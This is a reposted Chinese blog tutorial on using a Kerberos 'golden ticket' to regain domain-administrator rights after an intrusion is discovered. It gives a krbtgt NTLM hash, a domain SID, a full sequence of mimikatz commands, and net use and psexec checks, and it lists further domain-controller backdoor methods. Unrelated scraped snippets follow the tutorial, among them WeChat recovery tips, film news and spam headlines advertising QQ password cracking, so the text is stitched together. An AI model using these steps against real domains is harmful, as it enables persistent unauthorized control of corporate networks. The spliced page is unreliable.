最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的 ,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的,不知道还有什么新 *** ,心中还有 *** ,如果想交流的朋友,可以加我聊聊。
我原来发过一个微博说
这就是我说的金之钥匙【"golden ticket(s)"黄金票据】,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:
要重新拿回域管理员权限,首先要先知道域内的管理员有谁
我这里的实验环境,通过截图可以看到域管理员是administrator
我还要知道域SID是啥
我的域SID是
还有最重要的krbtgt用户的ntlm哈希,我原来导出的是
krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::
然后该用神器mimikatz出场了,依次执行
mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt
到现在,我们又重新拥有域管理员权限了,可以验证下
E:\>net use \\WIN-0DKN2AS0T2G\c$
E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd
呃,感觉这个 *** 比http://drops.wooyun.org/tips/9297这个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。
当然除了golden ticket,silver ticket之外还有kerberos ticket,历史SID,AdminSDHolder,DSRM,GPP,DCSync等技术手段都可以用来当做域控的隐藏后门。
【原文:域渗透的金之钥匙 作者:mickey 安全脉搏整理发布】
相信现在有很多的朋友们对于更改户名需要房产证吗都想要了解吧,那么今天小编就来给大家针对更改户名需要房产证吗进行一个介绍吧,希望小编介绍的内容能够为大家起到帮助哦 变更房产证登记人姓名,就是办理过户,转...
删了微信聊天框怎样找回记录(微信误删聊天框怎么恢复)微信聊天记录承载了我们很多的记忆,相信很多人都不会轻易删除自己的微信聊天记录。但是不百思特网小心删除聊天窗口,聊天记录怎么恢复呢?一起来看看吧~...
手机微信早已变成中国人日常日常生活最普及化的手机app。除开闲聊通信以外,扫一扫也是手机微信的关键作用:支付扫一扫,添加好友扫一扫,加微信公众号扫一扫这些,客户经常的应用有时候会遇到死机的状况,那麼是...
娱乐中国讯 昨日,《粤港澳大湾区发展规划纲要》实施两周年粤港澳电影交流与合作主题新闻发布活动在广州举办,百荷影视传媒(广州)有限公司创始人范冰心受邀出席并发言。作为广州影视公司代表,她在访谈中表示:“...
本文目录一览: 1、手机可以制作生日快乐代码吗 2、手机上怎么制作编程 3、手机怎么写程序 4、如何用手机编程 5、怎么用c语言在手机上做编程 手机可以制作生日快乐代码吗 java生...
为什么说黑客是霉粉 求个卖微信的联系方式(外围女微信联系方式) 若何成为黑客博客 秒破qq密码手机版免费(qq盗号软件破密码网站) 名钻赌场豪劫黑客怎么解锁 苹果手机被黑客入...